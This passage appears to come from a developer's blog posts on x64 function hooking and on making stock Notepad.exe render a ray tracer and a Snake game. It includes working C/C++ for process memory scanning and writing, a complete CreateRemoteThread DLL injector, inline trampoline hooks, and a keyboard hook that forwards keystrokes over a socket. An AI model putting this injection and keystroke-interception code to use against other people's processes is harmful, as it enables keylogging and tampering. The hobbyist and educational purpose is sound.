void RelocateInstruction(cs_insn* inst, void* dstLocation)
{
    cs_x86* x86 = &(inst->detail->x86);
    uint8_t offset = x86->encoding.disp_offset;

    uint64_t displacement = inst->bytes[x86->encoding.disp_offset];
    switch (x86->encoding.disp_size)
    {
    case 1:
    {
        int8_t disp = GetDisplacement<uint8_t>(inst, offset);
        disp -= int8_t(uint64_t(dstLocation) - inst->address);
        memcpy(&inst->bytes[offset], &disp, 1);
    }break;

    case 2:
    {
        int16_t disp = GetDisplacement<uint16_t>(inst, offset);
        disp -= int16_t(uint64_t(dstLocation) - inst->address);
        memcpy(&inst->bytes[offset], &disp, 2);
    }break;

    case 4:
    {
        int32_t disp = GetDisplacement<int32_t>(inst, offset);
        disp -= int32_t(uint64_t(dstLocation) - inst->address);
        memcpy(&inst->bytes[offset], &disp, 4);
    }break;
    }
}

uint32_t BuildTrampoline(void* func2hook, void* dstMemForTrampoline)
{
    X64Instructions stolenInstrs = StealBytes(func2hook);

    uint8_t* stolenByteMem = (uint8_t*)dstMemForTrampoline;
    uint8_t* jumpBackMem = stolenByteMem + stolenInstrs.numBytes;
    uint8_t* absTableMem = jumpBackMem + 13; //13 is the size of a 64 bit mov/jmp instruction pair

    for (uint32_t i = 0; i < stolenInstrs.numInstructions; ++i)
    {
        cs_insn& inst = stolenInstrs.instructions[i];
        if (inst.id >= X86_INS_LOOP && inst.id <= X86_INS_LOOPNE)
        {
            return 0; //bail out on loop instructions, I don't have a good way of handling them 
        }

        if (IsRIPRelativeInstr(inst))
        {
            RelocateInstruction(&inst, stolenByteMem);
        }
        else if (IsRelativeJump(inst))
        {
            uint32_t aitSize = AddJmpToAbsTable(inst, absTableMem);
            RewriteJumpInstruction(&inst, stolenByteMem, absTableMem);
            absTableMem += aitSize;
        }
        else if (inst.id == X86_INS_CALL)
        {
            uint32_t aitSize = AddCallToAbsTable(inst, absTableMem, jumpBackMem);
            RewriteCallInstruction(&inst, stolenByteMem, absTableMem);
            absTableMem += aitSize;
        }
        memcpy(stolenByteMem, inst.bytes, inst.size);
        stolenByteMem += inst.size;
    }

    WriteAbsoluteJump64(jumpBackMem, (uint8_t*)func2hook + 5);
    free(stolenInstrs.instructions);

    return uint32_t(absTableMem - (uint8_t*)dstMemForTrampoline);
}


void InstallHook(void* func2hook, void* payloadFunc, void** trampolinePtr)
{
    DWORD oldProtect;
    VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

    void* hookMemory = AllocatePageNearAddress(func2hook);
    uint32_t trampolineSize = BuildTrampoline(func2hook, hookMemory);
    *trampolinePtr = hookMemory;

    //create the relay function
    void* relayFuncMemory = (char*)hookMemory + trampolineSize;
    WriteAbsoluteJump64(relayFuncMemory, payloadFunc); //write relay func instructions

    //install the hook
    uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };
    const int32_t relAddr = (int32_t)relayFuncMemory - ((int32_t)func2hook + sizeof(jmpInstruction));
    memcpy(jmpInstruction + 1, &relAddr, 4);
    memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

//returns the first module called "name" -> only searches for dll name, not whole path
//ie: somepath/subdir/mydll.dll can be searched for with "mydll.dll"
HMODULE FindModuleInProcess(HANDLE process, const char* name)
{
    char* lowerCaseName = _strdup(name);
    _strlwr_s(lowerCaseName, strlen(name)+1);

    HMODULE remoteProcessModules[1024];
    DWORD numBytesWrittenInModuleArray = 0;
    BOOL success = EnumProcessModules(process, remoteProcessModules, sizeof(HMODULE) * 1024, &numBytesWrittenInModuleArray);

    if (!success)
    {
        fprintf(stderr, "Error enumerating modules on target process. Error Code %lu \n", GetLastError());
        DebugBreak();
    }

    DWORD numRemoteModules = numBytesWrittenInModuleArray / sizeof(HMODULE);
    CHAR remoteProcessName[256];
    GetModuleFileNameEx(process, NULL, remoteProcessName, 256); //a null module handle gets the process name
    _strlwr_s(remoteProcessName, 256);

    MODULEINFO remoteProcessModuleInfo;
    HMODULE remoteProcessModule = 0; //An HMODULE is the DLL's base address 

    for (DWORD i = 0; i < numRemoteModules; ++i)
    {
        CHAR moduleName[256];
        CHAR absoluteModuleName[256];
        CHAR rebasedPath[256] = { 0 };
        GetModuleFileNameEx(process, remoteProcessModules[i], moduleName, 256);
        _strlwr_s(moduleName, 256);
        char* lastSlash = strrchr(moduleName, '\\');
        if (!lastSlash) lastSlash = strrchr(moduleName, '/');

        char* dllName = lastSlash + 1;

        if (strcmp(dllName, lowerCaseName) == 0)
        {
            remoteProcessModule = remoteProcessModules[i];

            success = GetModuleInformation(process, remoteProcessModules[i], &remoteProcessModuleInfo, sizeof(MODULEINFO));
            free(lowerCaseName);
            return remoteProcessModule;
        }
        //the following string operations are to account for cases where GetModuleFileNameEx
        //returns a relative path rather than an absolute one, the path we get to the module
        //is using a virtual drive letter (ie: one created by subst) rather than a real drive
        char* err = _fullpath(absoluteModuleName, moduleName, 256);
    }

    free(lowerCaseName);
    return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
    {
        HMODULE gdiPlusModule = FindModuleInProcess(GetCurrentProcess(), "gdiplus.dll");
        void* localHookFunc4 = GetProcAddress(gdiPlusModule, ("GdipSetSolidFillColor"));
        InstallHook(localHookFunc4, GdipSetSolidFillColorPayload, (void**)&GdipSetSolidFillColorTrampoline);
    }
    return true;
}

Where to Go Next

Despite being by far the longest post I’ve written to date, this rabbit hole goes a whole lot deeper than what I’ve written about here.

First of all, there are significant issues with the code written in this post:

There’s no way to uninstall hooks
Hooking 32 bit applications isn’t supported at all
Everything breaks if 2 hooked functions share a payload
Stuff also breaks if a thread is executing instructions while they’re being stolen
More stuff breaks if the stolen instructions for a function use the r10 register
There are at least 3 additional scary problems I don’t know about yet

I solve some of these problems (at least in a “good enough” sorta way) in my hooking-by-example repo, but others are left, I suppose, as an exercise for the reader. If you want to learn more, the sources for Detours, Minhook, Easyhook and Polyhook might be of interest. I found the Polyhook code the easiest to read, for whatever that’s worth.

There’s also some really cool approaches to function hooking that don’t require you to know the function signature of what you’re hooking. I haven’t delved into this at all, but I’ve had this github repo starred for awhile now.

Lastly, there’s a whole world of other hooking techniques out there. One that seems particularly interesting to me is import address table hooking, which RenderDoc uses. I expect I’ll lose several weekends to this very soon.

Final Thoughts

I’ve written a lot already, so I’ll keep my sign off short. There are two things that I didn’t find room to mention in the ocean of text above that I think warrant a mention:

If you try to disassemble a function that you have breakpoints set in, you’re going to have a bad time.
To debug an injected dll, attach your debugger to the process the dll was injected into.

Finally, my twitter handle is @khalladay. Send me questions or comments or whatever there. I’ll probably respond, unless I’m tired that day and forget to come back to it later.

Ray Tracing In Notepad.exe At 30 FPS

2020-05-20T00:00:00+00:00

A few months back, there was a post on Reddit (link), which described a game that used an open source clone of Notepad to handle all its input and rendering. While reading about it, I had the thought that it would be really cool to see something similar that worked with stock Windows Notepad. Then I spent way too much of my free time doing exactly that.

I ended up making a Snake game and a small ray tracer that use stock Notepad for all input and rendering tasks, and got to learn about DLL Injection, API Hooking and Memory Scanning along the way. It seemed like writing up the stuff I learned might make for an interesting read, and give me a chance to show off the dumb stuff I built at the same time, so that’s what these next couple blog posts will be about.

Due to length, I’ve split the writeup into two blog posts. This first post will talk about how Memory Scanners work, and how I used one to turn notepad.exe into a 30+ fps capable render target. I’ll also talk about the ray tracer that I built that rendered into Notepad.

The second post will talk about using windows hooks to capture input and share the Snake game I built that uses pretty much all the stuff described in both of these posts.

This post will cover how I made Notepad do this

If you just want to see the code, the whole project (including both the ray tracer and snake game) is up on github.

Sending Key Events To Notepad

The obvious place to kick all of this off is it to talk about sending key events to a running instance of Notepad. This was the boring part of the project so I’ll be brief.

If you’ve never built an app out of Win32 controls (like I hadn’t), you might be surprised to learn that every UI element, from a menu bar to a button is technically it’s own “window,” and sending key input to a program involves sending that input to the UI element you want to receive it. Luckily Visual Studio comes with a tool called Spy++ that can list all the windows that make up a given application.

The windows listed for Notepad in Spy++

Spy++ revealed that the Notepad child window I was after was the “Edit” window. Once I knew that, it was just a matter of figuring out the right mix of Win32 function calls to get an HWND for that UI element, and then sending key inputs there. Getting that HWND looked something like this:

HWND GetWindowForProcessAndClassName(DWORD pid, const char* className)
{
  HWND curWnd = GetTopWindow(0); //0 arg means to get the window at the top of the Z order
  char classNameBuf[256];

  while (curWnd != NULL){
    DWORD curPid;
    DWORD dwThreadId = GetWindowThreadProcessId(curWnd, &curPid);

    if (curPid == pid){
      GetClassName(curWnd, classNameBuf, 256);
      if (strcmp(className, classNameBuf) == 0) return curWnd;

      HWND childWindow = FindWindowEx(curWnd, NULL, className, NULL);
      if (childWindow != NULL) return childWindow;
    }
    curWnd = GetNextWindow(curWnd, GW_HWNDNEXT);
  }
  return NULL;
}

Once I had the HWND for the right control, drawing a character in Notepad’s edit control was just a matter of using PostMessage to send a WM_CHAR event to it.

Note that if you want to use Spy++ yourself, you probably want to use the 64 bit version of it, which is inexplicably not the verion that Visual Studio 2019 launches by default. Instead you’ll need to search your Visual Studio Program files for “spyxx_amd64.exe.”

It took about 10 seconds after getting this working to realize that even if I could find a non-janky way to use window messages to draw full game screens into Notepad, it would be way too slow to even come close to approaching a 30hz refresh cycle. It was also really boring, so I didn’t spend too long looking for ways to make it go any faster.

CheatEngine For Good Guys

While getting the fake key input set up, I was reminded of CheatEngine. It’s a program that let’s users find and modify memory in processes running on their machines. Most of the time it’s used by people trying to cheat at games or do other stuff that makes game devs sad, but it turns out if can also be a force for good.

Memory Scanners like CheatEngine work by finding all the memory addresses in a target process which contain a specific value. Let’s say you’re playing a game and you want to give yourself more health, you could follow a process that look like this:

Use a memory scanner to find all addresses in the game’s memory that store the value of your health (let’s say 100).
Do something in game to modify your health to a new value (like 92).
Search all the addresses you found previously (that stored 100) to find ones that now store 92.
Repeat this process until you have a single memory address (which most likely is where your health is stored)
Modify the value at that address

CheatEngine and Notepad, friends at last

This is pretty much what I did, except instead of a health value, I searched for memory that stored the string of text currently displayed in Notepad. After some trial and error, I was able to use CheatEngine to find (and change) the text being displayed. I also learned three important bits of info about Notepad:

Notepad’s edit window stores on screen text in UTF-16, even if the bottom right part of the window says your file is UTF-8
If I kept deleting and retyping the same string, CheatEngine would start finding multiple copies of this data in memory (possibly the undo buffer?)
I couldn’t replace the displayed text with a longer string, meaning that Notepad wasn’t preallocating a text buffer up front

Building A Memory Scanner

Despite not being able to modify the length of the text buffer, this seemed promising enough that I decided to write my own small memory scanner to embed in my project.

I couldn’t find a lot of information about building memory scanners, but I did find a great blog post by Chris Wellons that talks about (and links to) a memory scanner that he wrote for his own cheat tool. Using that blog post and the bit of experience I had with CheatEngine, I was able to piece together that the basic algorithm for a memory scanner looks something like this:

FOR EACH block of memory allocated by our target process
    IF that block is committed and read/write enabled
        Scan the contents of that block for our byte pattern
        IF WE FIND IT
            return that address

My whole memory scanner implementation only ended up being ~40 lines of code, so I’m just going to walk through all of it.

Iterating Over A Process’ Memory

The first thing a memory scanner needs to be able to do is iterate over a process’ allocated memory.

Since the range of virtual memory for every 64 bit process on windows is the same (0x00000000000 through 0x7FFFFFFFFFFF), I started by making a pointer to address 0 and used VirtualQueryEx to get information about that virtual address for my target program.

VirtualQueryEx groups continguous pages that have identical memory attributes into MEMORY_BASIC_INFORMATION structs, so it’s likely that the struct returned by VirtualQueryEx for a given address contains information about more than 1 page. The returned MEMORY_BASIC_INFORMATION stores this shared set of memory attributes, along with the address of the start of its span of pages, and size of the whole span.

Once I had the first MEMORY_BASIC_INFORMATION struct, iterating through memory was just a matter of adding the current struct’s BaseAddress and RegionSize members together, and feeding the new address to VirtualQueryEx to get the next set of contiguous pages.

char* FindBytePatternInProcessMemory(HANDLE process, const char* pattern, size_t patternLen)
{
  char* basePtr = (char*)0x0;

  MEMORY_BASIC_INFORMATION memInfo;

  while (VirtualQueryEx(process, (void*)basePtr, &memInfo, sizeof(MEMORY_BASIC_INFORMATION)))
  {
    const DWORD mem_commit = 0x1000;
    const DWORD page_readwrite = 0x04;
    if (memInfo.State == mem_commit && memInfo.Protect == page_readwrite)
    {
      // search this memory for our pattern
    }

    basePtr = (char*)memInfo.BaseAddress + memInfo.RegionSize;
  }
}

The above code above skips ahead a bit and also determines if a set of pages has been committed and is read/write enabled, by examining the .State and .Protect struct members. You can find all the possible values for these vars in the documentation for MEMORY_BASIC_INFORMATION, but the values that my scanner cared about were a state of 0x1000 (MEM_COMMIT) and a protection level of 0x04 (PAGE_READWRITE).

Searching A Process’ Memory For a Byte Pattern

It’s not possible to read data in a different process’ address space directly (or at least, I didn’t stumble on how to do it). Instead, I first needed to copy the contents of a page range to the memory scanner’s address space. I did this with ReadProcessMemory.

Once the memory was copied to a locally visible buffer, searching it for a byte pattern was easy enough. To make things simpler, I ignored the possibility that there could be multiple copies of the target byte pattern in memory in my first scanner implementation. I ended up coming up with a hacky workaronud for this problem later on that saved me from ever having to actually address it in my scanner logic.

char* FindPattern(char* src, size_t srcLen, const char* pattern, size_t patternLen)
{
  char* cur = src;
  size_t curPos = 0;

  while (curPos < srcLen){
    if (memcmp(cur, pattern, patternLen) == 0){
      return cur;
    }

    curPos++;
    cur = &src[curPos];
  }
  return nullptr;
}

If FindPattern() returned a match pointer, it’s address needed to be converted to the address of the same bit of memory in the target process’ address space. To do that, I subtracted the starting address of the local buffer from the address that was returned from FindPattern to get an offset, and then added that to the base address of the memory chunk in the target process. You can see this below.

char* FindBytePatternInProcessMemory(HANDLE process, const char* pattern, size_t patternLen)
{
  MEMORY_BASIC_INFORMATION memInfo;
  char* basePtr = (char*)0x0;
  
  while (VirtualQueryEx(process, (void*)basePtr, &memInfo, sizeof(MEMORY_BASIC_INFORMATION))){
    const DWORD mem_commit = 0x1000;
    const DWORD page_readwrite = 0x04;
    if (memInfo.State == mem_commit && memInfo.Protect == page_readwrite){
      char* remoteMemRegionPtr = (char*)memInfo.BaseAddress;
      char* localCopyContents = (char*)malloc(memInfo.RegionSize);

      SIZE_T bytesRead = 0;
      if (ReadProcessMemory(process, memInfo.BaseAddress, localCopyContents, memInfo.RegionSize, &bytesRead)){
        char* match = FindPattern(localCopyContents, memInfo.RegionSize, pattern, patternLen);
        
        if (match){
          uint64_t diff = (uint64_t)match - (uint64_t)(localCopyContents);
          char* processPtr = remoteMemRegionPtr + diff;
          return processPtr;
        }
      }
      free(localCopyContents);
    }
    basePtr = (char*)memInfo.BaseAddress + memInfo.RegionSize;
  }
}

If you want to see a working example of this, check out the “MemoryScanner” project in the github repo that accompanies this blog post. Try it on Notepad! (it hasn’t been tried on anything else, so ymmv).

Using UTF-16 Byte Patterns

Remember from earlier that Notepad stores its on screen text buffer as UTF-16 data, so the byte pattern that gets fed to FindBytePatternInMemory() also has to be UTF-16. For simple strings, this just involves adding a zero byte after every character. The MemoryScanner project in github does this for you:

//convert input string to UTF16 (hackily)
const size_t patternLen = strlen(argv[2]);
char* pattern = new char[patternLen*2];
for (int i = 0; i < patternLen; ++i){
  pattern[i*2] = argv[2][i];
  pattern[i*2 + 1] = 0x0;
}

Updating and Redrawing Notepad’s Edit Control

Once I had the address of the displayed text buffer in Notepad, the next step was to use WriteProcessMemory to modify it. Writing code for that was trivial, but I quickly learned that just writing to the text buffer wasn’t enough to make Notepad redraw it’s Edit control.

Luckily the Win32 api had my back on this, and provides the InvalidateRect function to force a control to redraw itself.

All together, modifying the displayed text in Notepad something looked like this:

void UpdateText(HINSTANCE process, HWND editWindow, char* notepadTextBuffer, char* replacementTextBuffer, int len)
{
  size_t written = 0;
  WriteProcessMemory(process, notepadTextBuffer, replacementTextBuffer, len, &written);

  RECT r;
  GetClientRect(editWindow, &r);
  InvalidateRect(editWindow, &r, false);
}

From Memory Scanner to Renderer

The gap between a working memory scanner and a full fledged notepad renderer is surprisingly small. There were only three issues that needed to be sorted out to go from what I’ve described so far to the ray tracer teased at the beginning of this post.

These issues were:

I needed to control the size of the Notepad window
I still couldn’t expand the size of the on screen text buffer
My memory scanner didn’t handle duplicate byte patterns.

The first issue wasn’t much of a problem on it’s own. It was trivial to add a call to MoveWindow, but I included it in the list because this was an important part of how I approached the next issue on the list.

I ended up hard coding the size I wanted my Notepad window to be, and then counted how many characters (of a monospace font) it would take to exactly fill a window of that size. Then after calling MoveWindow, I pre-allocated the on screen text buffer by sending that many WM_CHAR messages to Notepad. This felt like cheating, but the good kind of cheating.

To make sure that I always had a unique byte pattern to search for, I just randomized which chars I sent in the WM_CHAR messages.

I’ve included what this might look like in code. The actual code in the github repo is formatted a little bit differently, but works the same way.

void PreallocateTextBuffer(DWORD processId)
{
  HWND editWindow = GetWindowForProcessAndClassName(processId, "Edit");

  // it takes 131 * 30 chars to fill a 1365x768 window with Consolas (size 11) chars
  MoveWindow(instance.topWindow, 100, 100, 1365, 768, true); 

  size_t charCount = 131 * 30;
  size_t utf16BufferSize = charCount * 2;

  char* frameBuffer = (char*)malloc(utf16BufferSize);
  for (int i = 0; i < charCount; i++){
    char v = 0x41 + (rand() % 26);
    PostMessage(editWindow, WM_CHAR, v, 0);
    frameBuffer[i * 2] = v;
    frameBuffer[i * 2 + 1] = 0x00;
  }
  
  Sleep(5000); //wait for input messages to finish processing...it's slow. 
  //Now use the frameBuffer as the unique byte pattern to search for
}

What this meant for the end product is that immediately after starting, I had to watch my Notepad window slowly fill up with random characters, before I could acquire the text buffer pointer and clear the screen.

All of the above relies on using a known font face and font size in order to work right. I was going to add some code to force notepad to use the fonts I wanted (Consolas, 11pt), but for some reason sending WM_SETFONT messages kept messing up how fonts were displaying, and I didn’t feel like figuring out what was going wrong there. Consolas 11pt was the default Notepad font on my system, which was good enough for me.

Ray Tracing In Notepad

Explaining how to build a ray tracer is well beyond the scope of what I want to talk about in this post. If you’re unfamiliar with ray tracing in general, head over to ScratchAPixel and learn you some ray tracing for great good. What I want to finish off this post with is a quick discussion of the nuts and bolts of hooking a ray tracer up to all the stuff I just talked about.

It probably makes sense to start off with the frame buffers. In order to minimze the amount of WriteProcessMemory calls (both for sanity and performance), I allocated a ray-tracer-local buffer that was the same size as Notepad’s text buffer (number of characters * 2 (because UTF16)). All the rendering calculations would write to this local buffer until the end of the frame, when I used a single WriteProcessMemory call to replace the entire contents of Notepad’s buffer at once. This led to a really simple set of functions for drawing:

void drawChar(int x, int y, char c); //local buffer
void clearScreen(); // local buffer
void swapBuffersAndRedraw(); // pushes changes and refreshes screen.

On the ray tracing side, given the low resolution of my render target (131 x 30), I had to keep things very simple, since there just wasn’t enough “pixels” to display fine detail nicely. I ended up only tracing a single primary ray, and a shadow ray for each pixel being rendered to, and I thought about ditching the shadows until I found a nice grayscale float to ascii color ramp on Paul Bourke’s website. Having such a low complexity scene and small render surface also meant that I didn’t end up needing to parallelize the rendering at all.

I also ran into some issues getting things to look right due to characters being taller than they are wide. In the end, I “fixed” this by halving the width value I used in my aspect ratio calculations.

float aspect = (0.5f * SCREEN_CHARS_WIDE) / float(SCREEN_CHARS_TALL);

The one remaining problem that I haven’t found a workable solution for is that updating the contents of the Notepad’s edit control so frequently causes a very noticeable flicker. I tried a bunch of different things to get rid of this, including trying to double buffer the edit control by allocating twice the number of characters and using WM_VSCROLL messages to “swap” the buffer by adjusting the scroll bar position. Unfortunately nothing I tried worked, and the flicker remains.

Part 2: Input Boogaloo is Available Now!

The next (and final) part of my quest to make a real-time game in Notepad was to figure out how to handle user input. If you’ve gotten this far and are thirsty for more, the next post is available here!

Hooking Keyboard Input To Play Snake In Notepad.exe

2020-05-20T00:00:00+00:00

This is second (and last) post about my quest to make a real-time game playable in stock Notepad.exe. In the previous article, I talked through using a quick and dirty memory scanner to get access to Notepad’s on screen text buffer (and build a ray tracer that rendered into it). In this post I’m going to talk about how I handled getting user input, and finally ended up at a fully playable Snake game in stock Notepad.

The flickering problem from last time is still very not-fixed

Baby’s First DLL Injection

The title of this post gives away the fact that I ended using hooks to capture user input, but I originally thought I could do it with just DLL injection instead. I barely knew what DLL injection was but I knew it could cause things to happen in an already running process. This seemed like a decent place to start. As it turns out, you need to understand dll injection to work with hooks anyway, so it’s not a bad spot to start this blog post too.

I started by googling the hell out of “DLL injection,” and found this excellent article that breaks down what DLL Injection is and has a great github repo with examples of different ways to go about it. I didn’t have a clue about how I was going to use any of this capture keyboard input, but I figured I’d try to inject something simple into a running Notepad process anyway.

Based on the injection article I just linked, the easiest way to inject a dll seems to be:

Create a DLL that performs some action in dllmain when it is loaded
Open a handle (“attach”) to a running process
Allocate some memory in that process’ address space
Use LoadLibrary to load that DLL into that process
When it loads, that DLL does the stuff in dllmain

Writing a DLL that does something in dllmain() is really easy if you aren’t doing a whole lot with it. I found later on that there’s a whole lot of stuff that you can’t do in dllmain (more info here), but for my first test project I just popped open a message box. The entire code for the DLL payload was just a few lines.

//a small dll payload that spawns a message box in whatever process loads the dll
#define WIN32_LEAN_AND_MEAN 
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  switch (ul_reason_for_call){
    case DLL_PROCESS_ATTACH:
      MessageBox(NULL, "Process attach!", "Woohoo", 0);
      break;
  }
}

The tricky part, as you might imagine, was getting Notepad to load this in the first place. Just like the above payload, my injection code was almost entirely copied from the InjectAllTheThings repo I linked above. Unlike the payload, it’s a lot longer. I’m including it here because if you’ve never seen how to do this before, I assume this will be more convenient than having to click a link to github, but I’m not going to dive into how it works because the article/repo I linked above can teach you about it a whole lot better than I can.

Full DLL Injection Code (click to expand)

//Injector_LoadLibrary is a dll injector that uses LoadLibraryA to inject a dll into a running process
// usage: Injector_LoadLibrary <process name> <path to dll> 

#include <stdio.h>
#include <Windows.h>
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h

void printHelp()
{
	printf("Injector_LoadLibrary\nUsage: Injector_LoadLibrary <process name> <path to dll>\n");
}

void createRemoteThread(DWORD processID, const char* dllPath)
{
	HANDLE handle = OpenProcess(
		PROCESS_QUERY_INFORMATION | //Needed to get a process' token
		PROCESS_CREATE_THREAD |	  //for obvious reasons
		PROCESS_VM_OPERATION |	  //required to perform operations on address space of process (like WriteProcessMemory)
		PROCESS_VM_WRITE,	//required for WriteProcessMemory
		FALSE,			//don't inherit handle
		processID);

	if (handle == NULL)
	{
		fprintf(stderr, "Could not open process with pid: %lu\n", processID);
		return;
	}

	//once the process is open, we need to write the name of our dll to that process' memory
	size_t dllPathLen = strlen(dllPath);
	void* dllPathRemote = VirtualAllocEx(
		handle,
		NULL, //let the system decide where to allocate the memory
		dllPathLen,
		MEM_COMMIT, //actually commit the virtual memory
		PAGE_READWRITE); //mem access for committed page
	
	if (!dllPathRemote)
	{
		fprintf(stderr, "Could not allocate %zd bytes in process with pid: %lu\n", dllPathLen, processID);
		return;
	}

	BOOL writeSucceeded = WriteProcessMemory(
		handle,
		dllPathRemote,
		dllPath,
		dllPathLen,
		NULL);
	
	if (!writeSucceeded)
	{
		fprintf(stderr, "Could not write %zd bytes to process with pid %lu\n", dllPathLen, processID);
		return;
	}

	//now get address of LoadLibraryW function inside Kernel32.dll
	//TEXT macro "Identifies a string as Unicode when UNICODE is defined by a preprocessor directive during compilation. Otherwise, ANSI string"
	PTHREAD_START_ROUTINE loadLibraryFunc = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")), "LoadLibraryA");
	if (loadLibraryFunc == NULL)
	{
		fprintf(stderr, "Could not find LoadLibraryA function inside kernel32.dll\n");
		return;
	}

	//now create a thread in remote process that loads our target dll using LoadLibraryA

	HANDLE remoteThread = CreateRemoteThread(
		handle,
		NULL, //default thread security
		0, //stack size for thread
		loadLibraryFunc, //pointer to start of thread function (for us, LoadLibraryA)
		dllPathRemote, //pointer to variable being passed to thread function
		0, //0 means the thread runs immediately after creation
		NULL); //we don't care about getting back the thread identifier

	if (remoteThread == NULL)
	{
		fprintf(stderr, "Could not create remote thread.\n");
		return;
	}
	else
	{
		fprintf(stdout, "Success! remote thread started in process %d\n", processID);
	}

	// Wait for the remote thread to terminate
	WaitForSingleObject(remoteThread, INFINITE);

	//once we're done, free the memory we allocated in the remote process for the dllPathname, and shut down
	VirtualFreeEx(handle, dllPathRemote, 0, MEM_RELEASE);
	CloseHandle(remoteThread);
	CloseHandle(handle);
}

DWORD findPidByName(const char* name)
{
	HANDLE h;
	PROCESSENTRY32 singleProcess;
	h = CreateToolhelp32Snapshot( //takes a snapshot of specified processes
		TH32CS_SNAPPROCESS, //get all processes
		0); //ignored for SNAPPROCESS

	singleProcess.dwSize = sizeof(PROCESSENTRY32);

	do {

		if (strcmp(singleProcess.szExeFile, name) == 0)
		{
			DWORD pid = singleProcess.th32ProcessID;
			printf("PID Found: %lu\n", pid);
			CloseHandle(h);
			return pid;
		}

	} while (Process32Next(h, &singleProcess));

	CloseHandle(h);

	return 0;
}

int main(int argc, const char** argv)
{
	if (argc != 3)
	{
		printHelp();
	}

	createRemoteThread(findPidByName(argv[1]), argv[2]);

	return 0;
}

This was enough to get a message box popping up in a running instance of Notepad, which was super cool. Unfortunately I realized pretty much immediately after I got this working that I had no idea how to go from popping a message box to using this to actually change Notepad’s behaviour.

Celebrate the little things

Let’s Try Hooking!

My message box app could make something new happen in another process, but I actually needed to be able to change the behaviour of the target process. I had heard vaguely about api hooking before, and my limited understanding of it was that it allowed you to either replace existing code paths, or add additional functionality to them. This seemed roughly in line with what I wanted, so I dove down this rabbit hole next.

Googling for how hooking works was less straightforward than dll injection, mostly because hooking is much more complicated. I eventually realized that as long as I wanted to change a program’s reponse to a Windows system message, I could bypass a lot of this complexity and use a Win32 hook. Given that keyboard input is sent to Windows processes via WH_KEYBOARD messages, I was in luck.

The MDSN page for hooks provides some basic information about how these types of hooks work, but the general idea is like this (note: I’m a super beginner at all of this so take everything I say with a grain of salt):

Windows apps (and individual Win32 controls) receive events from the OS via system messages.
Before these messages are passed to the message handling function for a given Win32 window, it first gets passed to that system message’s “hook chain,” which is a list of functions that perform some action in response to that event type before the window has a chance to respond.
Each hook function is responsible for passing the system message information to the next item in the hook chain
If a hook function doesn’t call the next function in the hook chain, the message can be lost before the window ever gets a chance to respond to it.

Given this information, it seemed reasonable to try to intercept the keyboard events sent to Notepad by creating a hook function which intentionally didn’t call the next function in the hook chain. After persuing the msdn docs page about using hooks, I figured out that I was going to need to install a WH_KEYBOARD hook into Notepad’s Edit control.

The docs also point out that if you want to install a hook in a process other than your own, what you’re really doing is a form of dll injection. You need to place the hook function in a dll, and use SetWindowsHookEx() to load that dll’s code into the target application.

So with all that in mind, I put on my robe and wizard hat and got to work.

Writing a Simple Hook Payload

I started off by just trying to prevent Notepad from receiving keyboard input at all. All I needed to do for this was to hook the WH_KEYBOARD and then not call the next hook in the hook chain, which seemed like an easy place to start. To write a hook function for WH_KEYBOARD, all you need to do is make sure to match the function signature of KeyboardProc(). Given that I needed this function to do basically nothing, this was pretty easy:

#define WIN32_LEAN_AND_MEAN 
#include <windows.h>
#include "inject_payload_disablekeyinput.h"

LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
{
  return 1;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  return true;
}

Installing A Hook In Notepad.exe

The code for installing a windows hook is very straightforward (and shown below).

bool installRemoteHook(DWORD threadId, const char* hookDLL)
{
	HMODULE hookLib = LoadLibrary(hookDLL);
	if (hookLib == NULL) return false;
	
	HOOKPROC hookFunc = (HOOKPROC)GetProcAddress(hookLib, "KeyboardProc");
	if (hookFunc == NULL) return false;
	
	SetWindowsHookEx(WH_KEYBOARD, hookFunc, hookLib, threadId);
	return true;
}

The threadId function argument is used to install the hook only for Notepad’s Edit control (otherwise it becomes a global hook). Getting the thread id is juat a matter of calling GetWindowThreadProcessId() on the HWND for the Edit control. You can get the HWND with the GetWindowForProcessAndClassName() function from my last post. Here’s that function again:

HWND GetWindowForProcessAndClassName(DWORD pid, const char* className)
{
  HWND curWnd = GetTopWindow(0); //0 arg means to get the window at the top of the Z order
  char classNameBuf[256];

  while (curWnd != NULL){
    DWORD curPid;
    DWORD dwThreadId = GetWindowThreadProcessId(curWnd, &curPid);

    if (curPid == pid){
      GetClassName(curWnd, classNameBuf, 256);
      if (strcmp(className, classNameBuf) == 0) return curWnd;

      HWND childWindow = FindWindowEx(curWnd, NULL, className, NULL);
      if (childWindow != NULL) return childWindow;
    }
    curWnd = GetNextWindow(curWnd, GW_HWNDNEXT);
  }
  return NULL;
}

One thing to note about the installRemoteHook() function is that because it gets the function pointer for the callback with GetProcAddress(), the compiled name of the hook callback is important. This meant that I needed to make sure that to export that function using “extern C” to prevent the compiler from mangling the function name.

#pragma once
extern "C"
{
  __declspec(dllexport) LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam);
}

If you want to see what all of this looks like in pactice, the github repo for this blog post has a proof of concept hooking app uses the hook payload described above to disable key input to an instance of Notepad.

Redirecting Keyboard Input to a Different Process

Simply preventing Notepad from getting keyboard input was cool and all, but it was a far cry from being able to redirect that output to a game. What I wanted to be able to do was both prevent Notepad from getting keyboard input (so that the user couldn’t type characters and mess up what I was rendering), and redirect that key input to the process I was using to control my game logic.

Redirecting the key input to a different process wasn’t much more difficult than preventing key input. I just copy/pasted the code for disabling key input and made the following changes:

The Hooking app opens up a socket, and starts listening for messages before installing the hook
In the payload, when the first keyboard message is intercepted, the payload creates a client socket and connects to the Injector app
Then, whenever a keyboard message is seen by the hook callback, it sends that char code to the Injector app via this client socket

I’m not going to walk through how to set up windows sockets (but all the code for doing so is on the github page for this project). Instead, I just want to share the hook payload that I used to make this all happen.

SOCKET sock = INVALID_SOCKET;
